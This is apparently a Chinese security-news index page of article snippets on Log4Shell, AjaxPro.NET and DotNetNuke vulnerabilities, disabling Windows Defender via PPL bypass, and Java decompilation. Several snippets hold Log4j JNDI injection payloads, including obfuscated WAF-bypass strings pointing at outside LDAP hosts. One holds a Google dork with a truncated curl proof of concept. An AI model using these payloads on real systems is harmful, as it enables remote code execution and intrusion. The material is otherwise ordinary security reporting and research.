渗透技巧
Log4j Bypass WAF Payloads
${jndi:ldap://127.0.0.1:1389/ badClassName} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${...
【最新漏洞预警】开源组件漏洞之CVE-2021-23758 AjaxPro.NET反序列化漏洞
关注公众号回复“漏洞”获取环境或工具又一个开源组件漏洞来了!最近某核弹级漏洞让大家认识到,一旦开源中间组件存在漏洞,影响范围之大将难以估量。蹭一波热...
Log4shell中被忽视的威胁:BurpSuite插件
log4shell可以说是这几天最火爆的漏洞,对于红队人员,算是过了个早年。不过此漏洞覆盖范围之广,也可能殃及你我。这个漏洞已经爆出来好几天了,各大厂商都开...
G.O.S.S.I.P 学术论文推荐 2021-12-13 Translating C to safer Rust
最近学编程语言不提Rust都不好意思和别人打招呼了,可是我们这些只会C语言的老程序员怎么办呢?别怕,今天的论文推荐给你介绍一篇将C代码自动化翻译成Rust代...
log4j组件jndi注入
一、 利用代码${jndi:ldap://dnslog.com/exp}重磅漏洞,CVE-2021-44228正如朋友圈各种传播的,把这段代码放在各种地方X就行了,包括各种搜...
DotNetNuke1.x 文件下载漏洞
Googleintext:''Copyright 2019 by Associated Builders and Contractors''inurl:''/desktopmodules/eventscalendar/'POC:curl '<site>/desktopmodule...
每日安全动态推送(12-13)
Tencent Security Xuanwu Lab Daily News• CVE-2021-44228(Apache Log4j Remote Code Execution):https://github.com/tangxiaofeng7/CVE-2021-44228-Ap...
绕过ppl保护关闭Windows Defender
转载于黑白天实验室。描述可以关闭Windows Defender服务并通过提升权限删除ppl保护,然后删除Windows Defender中的DLL和其他文件,使Windows Defender服务无...
一些防止 Java 代码被反编译的方法
由于Java字节码的抽象级别较高,因此它们较容易被反编译。本节介绍了几种常用的方法,用于保护Java字节码不被反编译。通常,这些方法不能够绝对防止程序被反...
Log4j2 漏洞探索之一:Apache Solr 远程命令执行
一:漏洞描述?经过Log4j2漏洞的出现,攻击面逐渐被展开,同时 Apache Solr 也用到了此组件,能通过发送特定的请求包造成远程命令执行兄弟篇 - log4j2漏...